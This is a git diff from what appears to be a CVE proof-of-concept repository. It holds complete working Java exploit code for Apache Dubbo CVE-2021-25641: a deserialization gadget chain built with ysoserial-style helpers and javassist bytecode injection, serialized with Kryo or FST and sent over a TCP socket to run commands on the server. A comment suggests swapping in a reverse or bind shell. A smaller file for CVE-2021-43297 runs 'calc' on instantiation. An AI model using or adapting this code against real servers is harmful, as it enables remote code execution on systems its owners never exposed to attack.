@@ -1,60 +1,60 @@ - - - 4.0.0 - - groupId - DubboProtocolExploit - 1.0-SNAPSHOT - - - - org.apache.maven.plugins - maven-compiler-plugin - 3.8.1 - - 8 - 8 - - - - - - - org.apache.dubbo - dubbo - 2.7.3 - - - org.apache.dubbo - dubbo-common - 2.7.3 - - - com.alibaba - dubbo - 2.6.9 - - - com.alibaba - dubbo-remoting-netty4 - 2.6.9 - - - io.netty - netty-all - 4.1.60.Final - - - org.springframework - spring-web - 5.1.9.RELEASE - - - com.nqzero - permit-reflect - 0.4 - - - + + + 4.0.0 + + groupId + DubboProtocolExploit + 1.0-SNAPSHOT + + + + org.apache.maven.plugins + maven-compiler-plugin + 3.8.1 + + 8 + 8 + + + + + + + org.apache.dubbo + dubbo + 2.7.3 + + + org.apache.dubbo + dubbo-common + 2.7.3 + + + com.alibaba + dubbo + 2.6.9 + + + com.alibaba + dubbo-remoting-netty4 + 2.6.9 + + + io.netty + netty-all + 4.1.60.Final + + + org.springframework + spring-web + 5.1.9.RELEASE + + + com.nqzero + permit-reflect + 0.4 + + + diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java index 0efbaf721a16a33936938d78268edc9b618955b7..b165e7b8bd3c13f14943956ebd96792eed44f16d 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java +++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java 
@@ -1,157 +1,157 @@ -package DubboProtocolExploit; - - -import com.alibaba.fastjson.JSONObject; -import org.apache.dubbo.common.io.Bytes; -import org.apache.dubbo.common.serialize.Serialization; -import org.apache.dubbo.common.serialize.fst.FstObjectOutput; -import org.apache.dubbo.common.serialize.fst.FstSerialization; -import org.apache.dubbo.common.serialize.kryo.KryoObjectOutput; -import org.apache.dubbo.common.serialize.kryo.KryoSerialization; -import org.apache.dubbo.common.serialize.ObjectOutput; -import org.apache.dubbo.rpc.RpcInvocation; -import org.apache.dubbo.serialize.hessian.Hessian2ObjectOutput; -import org.apache.dubbo.serialize.hessian.Hessian2Serialization; -/*import com.alibaba.dubbo.common.io.Bytes; -import com.alibaba.dubbo.common.serialize.Serialization; -import com.alibaba.dubbo.common.serialize.fst.FstObjectOutput; -import com.alibaba.dubbo.common.serialize.fst.FstSerialization; -import com.alibaba.dubbo.common.serialize.kryo.KryoObjectOutput; -import com.alibaba.dubbo.common.serialize.kryo.KryoSerialization; -import com.alibaba.dubbo.common.serialize.ObjectOutput;*/ - -import java.io.ByteArrayOutputStream; -import java.io.IOException; -import java.io.OutputStream; -import java.io.Serializable; -import java.lang.reflect.Method; -import java.net.Socket; - -/* This Dubbo protocol exploit affects versions <= 2.7.3, - and will print "whoops!" on the server's console via RCE. 
- - This issue is caused by deserialization of untrusted data, - triggered via a communication protocol that allows dynamically - switching to a vulnerable deserializer, and exploited with a - payload gadget chain based on FastJson - - On Windows servers - it will try to execute calc.exe - On Linux servers - it will touch /tmp/dubboexploited - */ - -public class Main { - // Customize URL for remote targets - public static String DUBBO_HOST_NAME = "localhost"; - public static int DUBBO_HOST_PORT = 20880; - - // OS-specific payloads - comment to switch OS variants - // exploit will print "whoops!" on server console either way - //public static String DUBBO_RCE_COMMAND = "touch /tmp/dubboexploited"; // Linux - public static String DUBBO_RCE_COMMAND = "calc.exe"; // Windows - - //Exploit variant - comment to switch exploit variants - public static String EXPLOIT_VARIANT = "Kryo"; - //public static String EXPLOIT_VARIANT = "FST"; - - // Magic header from ExchangeCodec - protected static final short MAGIC = (short) 0xdabb; - protected static final byte MAGIC_HIGH = Bytes.short2bytes(MAGIC)[0]; - protected static final byte MAGIC_LOW = Bytes.short2bytes(MAGIC)[1]; - - // Message flags from ExchangeCodec - protected static final byte FLAG_REQUEST = (byte) 0x80; - protected static final byte FLAG_TWOWAY = (byte) 0x40; - - public static void main(String[] args) throws Exception { - Object templates = Utils.createTemplatesImpl(DUBBO_RCE_COMMAND); // TemplatesImpl gadget chain - - // triggers Runtime.exec() on TemplatesImpl.newTransformer() - JSONObject jo = new JSONObject(); - jo.put("oops",(Serializable)templates); // Vulnerable FastJSON wrapper - Object gadgetChain = Utils.makeXStringToStringTrigger(jo); // toString() trigger - - // encode request data. 
- ByteArrayOutputStream bos = new ByteArrayOutputStream(); - - // Kryo exploit variant - Serialization s; - ObjectOutput objectOutput; - switch(EXPLOIT_VARIANT) { - case "FST": - s = new FstSerialization(); - objectOutput = new FstObjectOutput(bos); - break; - case "Kryo": - default: - s = new KryoSerialization(); - objectOutput = new KryoObjectOutput(bos); - break; - } - - // 0xc2 is Hessian2 + two-way + Request serialization - // Kryo | two-way | Request is 0xc8 on third byte - // FST | two-way | Request is 0xc9 on third byte - - byte requestFlags = (byte) (FLAG_REQUEST | s.getContentTypeId() | FLAG_TWOWAY); - byte[] header = new byte[]{MAGIC_HIGH, MAGIC_LOW, requestFlags, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}; // Padding and 0 length LSBs - bos.write(header); - // Strings need only satisfy "readUTF" calls until "readObject" is reached, so garbage metadata works too - /* - objectOutput.writeUTF("notAversion"); - objectOutput.writeUTF("notAservice"); - objectOutput.writeUTF("notAserviceVersion"); - objectOutput.writeUTF("notAmethod"); - objectOutput.writeUTF("notAtype"); //*/ - - // This section contains valid data writes - RpcInvocation ri = new RpcInvocation(); - ri.setParameterTypes(new Class[] {Object.class, Method.class, Object.class}); - //ri.setParameterTypesDesc("Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;"); - ri.setArguments(new Object[] { "sayHello", new String[] {"org.apache.dubbo.demo.DemoService"}, new Object[] {"YOU"}}); - // Strings need only satisfy "readUTF" calls until "readObject" is reached - - // /* - objectOutput.writeUTF("2.0.2"); - objectOutput.writeUTF("org.apache.dubbo.demo.DemoService"); - objectOutput.writeUTF("0.0.0"); - objectOutput.writeUTF("sayHello"); - objectOutput.writeUTF("Ljava/lang/String;"); //*/ - - objectOutput.writeObject(gadgetChain); - objectOutput.writeObject(ri.getAttachments()); - - objectOutput.flushBuffer(); - byte[] payload = bos.toByteArray(); - int len = payload.length - header.length; - 
Bytes.int2bytes(len, payload, 12); - - // Dubbo Message Stream Hex Dump - for (int i = 0; i < payload.length; i++) { - System.out.print(String.format("%02X", payload[i]) + " "); - if ((i + 1) % 8 == 0) - System.out.print(" "); - if ((i + 1) % 16 == 0 ) - System.out.println(); - - } - // Payload string - System.out.println(); - System.out.println(new String(payload)); - - Socket pingSocket = null; - OutputStream out = null; - // Send request over TCP socket - try { - pingSocket = new Socket(DUBBO_HOST_NAME, DUBBO_HOST_PORT); - out = pingSocket.getOutputStream(); - } catch (IOException e) { - return; - } - out.write(payload); - out.flush(); - out.close(); - pingSocket.close(); - System.out.println("Sent!"); - } -} +package DubboProtocolExploit; + + +import com.alibaba.fastjson.JSONObject; +import org.apache.dubbo.common.io.Bytes; +import org.apache.dubbo.common.serialize.Serialization; +import org.apache.dubbo.common.serialize.fst.FstObjectOutput; +import org.apache.dubbo.common.serialize.fst.FstSerialization; +import org.apache.dubbo.common.serialize.kryo.KryoObjectOutput; +import org.apache.dubbo.common.serialize.kryo.KryoSerialization; +import org.apache.dubbo.common.serialize.ObjectOutput; +import org.apache.dubbo.rpc.RpcInvocation; +import org.apache.dubbo.serialize.hessian.Hessian2ObjectOutput; +import org.apache.dubbo.serialize.hessian.Hessian2Serialization; +/*import com.alibaba.dubbo.common.io.Bytes; +import com.alibaba.dubbo.common.serialize.Serialization; +import com.alibaba.dubbo.common.serialize.fst.FstObjectOutput; +import com.alibaba.dubbo.common.serialize.fst.FstSerialization; +import com.alibaba.dubbo.common.serialize.kryo.KryoObjectOutput; +import com.alibaba.dubbo.common.serialize.kryo.KryoSerialization; +import com.alibaba.dubbo.common.serialize.ObjectOutput;*/ + +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.OutputStream; +import java.io.Serializable; +import java.lang.reflect.Method; +import java.net.Socket; 
+ +/* This Dubbo protocol exploit affects versions <= 2.7.3, + and will print "whoops!" on the server's console via RCE. + + This issue is caused by deserialization of untrusted data, + triggered via a communication protocol that allows dynamically + switching to a vulnerable deserializer, and exploited with a + payload gadget chain based on FastJson + + On Windows servers - it will try to execute calc.exe + On Linux servers - it will touch /tmp/dubboexploited + */ + +public class Main { + // Customize URL for remote targets + public static String DUBBO_HOST_NAME = "localhost"; + public static int DUBBO_HOST_PORT = 20880; + + // OS-specific payloads - comment to switch OS variants + // exploit will print "whoops!" on server console either way + //public static String DUBBO_RCE_COMMAND = "touch /tmp/dubboexploited"; // Linux + public static String DUBBO_RCE_COMMAND = "calc.exe"; // Windows + + //Exploit variant - comment to switch exploit variants + public static String EXPLOIT_VARIANT = "Kryo"; + //public static String EXPLOIT_VARIANT = "FST"; + + // Magic header from ExchangeCodec + protected static final short MAGIC = (short) 0xdabb; + protected static final byte MAGIC_HIGH = Bytes.short2bytes(MAGIC)[0]; + protected static final byte MAGIC_LOW = Bytes.short2bytes(MAGIC)[1]; + + // Message flags from ExchangeCodec + protected static final byte FLAG_REQUEST = (byte) 0x80; + protected static final byte FLAG_TWOWAY = (byte) 0x40; + + public static void main(String[] args) throws Exception { + Object templates = Utils.createTemplatesImpl(DUBBO_RCE_COMMAND); // TemplatesImpl gadget chain + + // triggers Runtime.exec() on TemplatesImpl.newTransformer() + JSONObject jo = new JSONObject(); + jo.put("oops",(Serializable)templates); // Vulnerable FastJSON wrapper + Object gadgetChain = Utils.makeXStringToStringTrigger(jo); // toString() trigger + + // encode request data. 
+ ByteArrayOutputStream bos = new ByteArrayOutputStream(); + + // Kryo exploit variant + Serialization s; + ObjectOutput objectOutput; + switch(EXPLOIT_VARIANT) { + case "FST": + s = new FstSerialization(); + objectOutput = new FstObjectOutput(bos); + break; + case "Kryo": + default: + s = new KryoSerialization(); + objectOutput = new KryoObjectOutput(bos); + break; + } + + // 0xc2 is Hessian2 + two-way + Request serialization + // Kryo | two-way | Request is 0xc8 on third byte + // FST | two-way | Request is 0xc9 on third byte + + byte requestFlags = (byte) (FLAG_REQUEST | s.getContentTypeId() | FLAG_TWOWAY); + byte[] header = new byte[]{MAGIC_HIGH, MAGIC_LOW, requestFlags, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}; // Padding and 0 length LSBs + bos.write(header); + // Strings need only satisfy "readUTF" calls until "readObject" is reached, so garbage metadata works too + /* + objectOutput.writeUTF("notAversion"); + objectOutput.writeUTF("notAservice"); + objectOutput.writeUTF("notAserviceVersion"); + objectOutput.writeUTF("notAmethod"); + objectOutput.writeUTF("notAtype"); //*/ + + // This section contains valid data writes + RpcInvocation ri = new RpcInvocation(); + ri.setParameterTypes(new Class[] {Object.class, Method.class, Object.class}); + //ri.setParameterTypesDesc("Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;"); + ri.setArguments(new Object[] { "sayHello", new String[] {"org.apache.dubbo.demo.DemoService"}, new Object[] {"YOU"}}); + // Strings need only satisfy "readUTF" calls until "readObject" is reached + + // /* + objectOutput.writeUTF("2.0.2"); + objectOutput.writeUTF("org.apache.dubbo.demo.DemoService"); + objectOutput.writeUTF("0.0.0"); + objectOutput.writeUTF("sayHello"); + objectOutput.writeUTF("Ljava/lang/String;"); //*/ + + objectOutput.writeObject(gadgetChain); + objectOutput.writeObject(ri.getAttachments()); + + objectOutput.flushBuffer(); + byte[] payload = bos.toByteArray(); + int len = payload.length - header.length; + 
Bytes.int2bytes(len, payload, 12); + + // Dubbo Message Stream Hex Dump + for (int i = 0; i < payload.length; i++) { + System.out.print(String.format("%02X", payload[i]) + " "); + if ((i + 1) % 8 == 0) + System.out.print(" "); + if ((i + 1) % 16 == 0 ) + System.out.println(); + + } + // Payload string + System.out.println(); + System.out.println(new String(payload)); + + Socket pingSocket = null; + OutputStream out = null; + // Send request over TCP socket + try { + pingSocket = new Socket(DUBBO_HOST_NAME, DUBBO_HOST_PORT); + out = pingSocket.getOutputStream(); + } catch (IOException e) { + return; + } + out.write(payload); + out.flush(); + out.close(); + pingSocket.close(); + System.out.println("Sent!"); + } +} diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java index 8aaf5e6c5e316999baabf4d0da8d9b132a8730fa..e69a8a05cd3f6e044193ace14e9fe8fdf8d49d1f 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java +++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java 
@@ -1,221 +1,221 @@ -package DubboProtocolExploit; - -import com.nqzero.permit.Permit; -import com.sun.org.apache.xalan.internal.xsltc.DOM; -import com.sun.org.apache.xalan.internal.xsltc.TransletException; -import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; -import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; -import com.sun.org.apache.xml.internal.serializer.SerializationHandler; -import com.sun.org.apache.xpath.internal.objects.XString; -import javassist.ClassClassPath; -import javassist.ClassPool; -import javassist.CtClass; -import org.springframework.aop.target.HotSwappableTargetSource; -import sun.reflect.ReflectionFactory; - -import java.io.ByteArrayOutputStream; -import java.io.IOException; -import java.io.InputStream; -import java.io.Serializable; -import java.lang.reflect.*; -import java.util.HashMap; -import java.util.Map; - -import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET; - -/* - * Utility class - based on code found in ysoserial, includes method calls used in - * ysoserial.payloads.util specifically the Reflections, Gadgets, and ClassFiles classes. These were - * consolidated into a single util class for the sake of brevity; they are otherwise unchanged. 
- * - * Additionally, uses code based on marshalsec.gadgets.ToStringUtil.makeSpringAOPToStringTrigger - * to create a toString trigger - * - * ysoserial by Chris Frohoff - https://github.com/frohoff/ysoserial - * marshalsec by Moritz Bechler - https://github.com/mbechler/marshalsec - */ -public class Utils { - static { - // special case for using TemplatesImpl gadgets with a SecurityManager enabled - System.setProperty(DESERIALIZE_TRANSLET, "true"); - - // for RMI remote loading - System.setProperty("java.rmi.server.useCodebaseOnly", "false"); - } - - public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler"; - - public static class StubTransletPayload extends AbstractTranslet implements Serializable { - - private static final long serialVersionUID = -5971610431559700674L; - - - public void transform (DOM document, SerializationHandler[] handlers ) throws TransletException {} - - - @Override - public void transform (DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {} - } - - // required to make TemplatesImpl happy - public static class Foo implements Serializable { - - private static final long serialVersionUID = 8207363842866235160L; - } - - public static InvocationHandler createMemoizedInvocationHandler (final Map map ) throws Exception { - return (InvocationHandler) Utils.getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map); - } - - public static Object createTemplatesImpl ( final String command ) throws Exception { - if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) { - return createTemplatesImpl( - command, - Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"), - Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"), - Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl")); - } - - return createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class); - } - - 
- public static T createTemplatesImpl ( final String command, Class tplClass, Class abstTranslet, Class transFactory ) - throws Exception { - final T templates = tplClass.newInstance(); - - // use template gadget class - ClassPool pool = ClassPool.getDefault(); - pool.insertClassPath(new ClassClassPath(Utils.StubTransletPayload.class)); - pool.insertClassPath(new ClassClassPath(abstTranslet)); - final CtClass clazz = pool.get(Utils.StubTransletPayload.class.getName()); - // run command in static initializer - // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections - String cmd = "System.out.println(\"whoops!\"); java.lang.Runtime.getRuntime().exec(\"" + - command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + - "\");"; - clazz.makeClassInitializer().insertAfter(cmd); - // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion) - clazz.setName("ysoserial.Pwner" + System.nanoTime()); - CtClass superC = pool.get(abstTranslet.getName()); - clazz.setSuperclass(superC); - - final byte[] classBytes = clazz.toBytecode(); - - // inject class bytes into instance - Utils.setFieldValue(templates, "_bytecodes", new byte[][] { - classBytes, Utils.classAsBytes(Utils.Foo.class) - }); - - // required to make TemplatesImpl happy - Utils.setFieldValue(templates, "_name", "Pwnr"); - Utils.setFieldValue(templates, "_tfactory", transFactory.newInstance()); - return templates; - } - - public static void setAccessible(AccessibleObject member) { - // quiet runtime warnings from JDK9+ - Permit.setAccessible(member); - } - - public static Field getField(final Class clazz, final String fieldName) { - Field field = null; - try { - field = clazz.getDeclaredField(fieldName); - setAccessible(field); - } - catch (NoSuchFieldException ex) { - if (clazz.getSuperclass() != null) - field = getField(clazz.getSuperclass(), fieldName); - } - return field; - } - - public static void setFieldValue(final Object obj, final 
String fieldName, final Object value) throws Exception { - final Field field = getField(obj.getClass(), fieldName); - field.set(obj, value); - } - - public static Object getFieldValue(final Object obj, final String fieldName) throws Exception { - final Field field = getField(obj.getClass(), fieldName); - return field.get(obj); - } - - public static Constructor getFirstCtor(final String name) throws Exception { - final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0]; - setAccessible(ctor); - return ctor; - } - - @SuppressWarnings ( {"unchecked"} ) - public static T createWithConstructor ( Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs ) - throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { - Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); - setAccessible(objCons); - Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); - setAccessible(sc); - return (T)sc.newInstance(consArgs); - } - - public static String classAsFile(final Class clazz) { - return classAsFile(clazz, true); - } - - public static String classAsFile(final Class clazz, boolean suffix) { - String str; - if (clazz.getEnclosingClass() == null) { - str = clazz.getName().replace(".", "/"); - } else { - str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName(); - } - if (suffix) { - str += ".class"; - } - return str; - } - - public static byte[] classAsBytes(final Class clazz) { - try { - final byte[] buffer = new byte[1024]; - final String file = classAsFile(clazz); - final InputStream in = Utils.class.getClassLoader().getResourceAsStream(file); - if (in == null) { - throw new IOException("couldn't find '" + file + "'"); - } - final ByteArrayOutputStream out = new ByteArrayOutputStream(); - int len; - while ((len = in.read(buffer)) != -1) { - out.write(buffer, 0, len); - } - 
return out.toByteArray(); - } catch (IOException e) { - throw new RuntimeException(e); - } - } - public static HashMap makeMap (Object v1, Object v2 ) throws Exception { - HashMap s = new HashMap<>(); - Utils.setFieldValue(s, "size", 2); - Class nodeC; - try { - nodeC = Class.forName("java.util.HashMap$Node"); - } - catch ( ClassNotFoundException e ) { - nodeC = Class.forName("java.util.HashMap$Entry"); - } - Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); - nodeCons.setAccessible(true); - - Object tbl = Array.newInstance(nodeC, 2); - Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); - Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); - Utils.setFieldValue(s, "table", tbl); - return s; - } - - public static Object makeXStringToStringTrigger(Object o) throws Exception { - XString x = new XString("HEYO"); - return Utils.makeMap(new HotSwappableTargetSource(o), new HotSwappableTargetSource(x)); - } +package DubboProtocolExploit; + +import com.nqzero.permit.Permit; +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; +import com.sun.org.apache.xpath.internal.objects.XString; +import javassist.ClassClassPath; +import javassist.ClassPool; +import javassist.CtClass; +import org.springframework.aop.target.HotSwappableTargetSource; +import sun.reflect.ReflectionFactory; + +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.io.Serializable; +import java.lang.reflect.*; +import java.util.HashMap; +import java.util.Map; + +import static 
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET; + +/* + * Utility class - based on code found in ysoserial, includes method calls used in + * ysoserial.payloads.util specifically the Reflections, Gadgets, and ClassFiles classes. These were + * consolidated into a single util class for the sake of brevity; they are otherwise unchanged. + * + * Additionally, uses code based on marshalsec.gadgets.ToStringUtil.makeSpringAOPToStringTrigger + * to create a toString trigger + * + * ysoserial by Chris Frohoff - https://github.com/frohoff/ysoserial + * marshalsec by Moritz Bechler - https://github.com/mbechler/marshalsec + */ +public class Utils { + static { + // special case for using TemplatesImpl gadgets with a SecurityManager enabled + System.setProperty(DESERIALIZE_TRANSLET, "true"); + + // for RMI remote loading + System.setProperty("java.rmi.server.useCodebaseOnly", "false"); + } + + public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler"; + + public static class StubTransletPayload extends AbstractTranslet implements Serializable { + + private static final long serialVersionUID = -5971610431559700674L; + + + public void transform (DOM document, SerializationHandler[] handlers ) throws TransletException {} + + + @Override + public void transform (DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {} + } + + // required to make TemplatesImpl happy + public static class Foo implements Serializable { + + private static final long serialVersionUID = 8207363842866235160L; + } + + public static InvocationHandler createMemoizedInvocationHandler (final Map map ) throws Exception { + return (InvocationHandler) Utils.getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map); + } + + public static Object createTemplatesImpl ( final String command ) throws Exception { + if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) { + 
return createTemplatesImpl( + command, + Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"), + Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"), + Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl")); + } + + return createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class); + } + + + public static T createTemplatesImpl ( final String command, Class tplClass, Class abstTranslet, Class transFactory ) + throws Exception { + final T templates = tplClass.newInstance(); + + // use template gadget class + ClassPool pool = ClassPool.getDefault(); + pool.insertClassPath(new ClassClassPath(Utils.StubTransletPayload.class)); + pool.insertClassPath(new ClassClassPath(abstTranslet)); + final CtClass clazz = pool.get(Utils.StubTransletPayload.class.getName()); + // run command in static initializer + // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections + String cmd = "System.out.println(\"whoops!\"); java.lang.Runtime.getRuntime().exec(\"" + + command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + + "\");"; + clazz.makeClassInitializer().insertAfter(cmd); + // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion) + clazz.setName("ysoserial.Pwner" + System.nanoTime()); + CtClass superC = pool.get(abstTranslet.getName()); + clazz.setSuperclass(superC); + + final byte[] classBytes = clazz.toBytecode(); + + // inject class bytes into instance + Utils.setFieldValue(templates, "_bytecodes", new byte[][] { + classBytes, Utils.classAsBytes(Utils.Foo.class) + }); + + // required to make TemplatesImpl happy + Utils.setFieldValue(templates, "_name", "Pwnr"); + Utils.setFieldValue(templates, "_tfactory", transFactory.newInstance()); + return templates; + } + + public static void setAccessible(AccessibleObject member) { + // quiet runtime warnings from JDK9+ + Permit.setAccessible(member); + } + + public static Field 
getField(final Class clazz, final String fieldName) { + Field field = null; + try { + field = clazz.getDeclaredField(fieldName); + setAccessible(field); + } + catch (NoSuchFieldException ex) { + if (clazz.getSuperclass() != null) + field = getField(clazz.getSuperclass(), fieldName); + } + return field; + } + + public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { + final Field field = getField(obj.getClass(), fieldName); + field.set(obj, value); + } + + public static Object getFieldValue(final Object obj, final String fieldName) throws Exception { + final Field field = getField(obj.getClass(), fieldName); + return field.get(obj); + } + + public static Constructor getFirstCtor(final String name) throws Exception { + final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0]; + setAccessible(ctor); + return ctor; + } + + @SuppressWarnings ( {"unchecked"} ) + public static T createWithConstructor ( Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs ) + throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); + setAccessible(objCons); + Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); + setAccessible(sc); + return (T)sc.newInstance(consArgs); + } + + public static String classAsFile(final Class clazz) { + return classAsFile(clazz, true); + } + + public static String classAsFile(final Class clazz, boolean suffix) { + String str; + if (clazz.getEnclosingClass() == null) { + str = clazz.getName().replace(".", "/"); + } else { + str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName(); + } + if (suffix) { + str += ".class"; + } + return str; + } + + public static byte[] classAsBytes(final Class clazz) { + try { + final byte[] buffer = new 
byte[1024]; + final String file = classAsFile(clazz); + final InputStream in = Utils.class.getClassLoader().getResourceAsStream(file); + if (in == null) { + throw new IOException("couldn't find '" + file + "'"); + } + final ByteArrayOutputStream out = new ByteArrayOutputStream(); + int len; + while ((len = in.read(buffer)) != -1) { + out.write(buffer, 0, len); + } + return out.toByteArray(); + } catch (IOException e) { + throw new RuntimeException(e); + } + } + public static HashMap makeMap (Object v1, Object v2 ) throws Exception { + HashMap s = new HashMap<>(); + Utils.setFieldValue(s, "size", 2); + Class nodeC; + try { + nodeC = Class.forName("java.util.HashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.HashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + nodeCons.setAccessible(true); + + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); + Utils.setFieldValue(s, "table", tbl); + return s; + } + + public static Object makeXStringToStringTrigger(Object o) throws Exception { + XString x = new XString("HEYO"); + return Utils.makeMap(new HotSwappableTargetSource(o), new HotSwappableTargetSource(x)); + } } \ No newline at end of file diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java index f8b4fc2f419f6c97f4e4623e2d14c4976b5a929e..c4065966441b9045955fbbde378a86d92b3b1cf1 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java +++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java 
@@ -1,5 +1,5 @@
-package org.apache.dubbo.demo;
-
-public interface DemoService {
- public Object sayHello(Object o);
-}
+package org.apache.dubbo.demo;
+
+public interface DemoService {
+ public Object sayHello(Object o);
+}
diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java b/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java
index 9651b3ac3e070f7ea445d4020b2e80f72c88b986..38ac7094443c8fee451ee4aeb5c3f78c42797134 100644
--- a/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java
+++ b/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java
@@ -1,7 +1,7 @@
-import java.io.IOException;
-public class ExecTest {
- public ExecTest() throws IOException {
- new java.io.IOException().printStackTrace();
- java.lang.Runtime.getRuntime().exec("calc");
- }
-}
+import java.io.IOException;
+public class ExecTest {
+ public ExecTest() throws IOException {
+ new java.io.IOException().printStackTrace();
+ java.lang.Runtime.getRuntime().exec("calc");
+ }
+}
diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java b/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java
index 167cbaef032374d0d39cf3e224cd2c6c97013066..e65ac5e8ea9acddb3c8e22ca2b847adc18092458 100644
--- a/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java
+++ b/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java
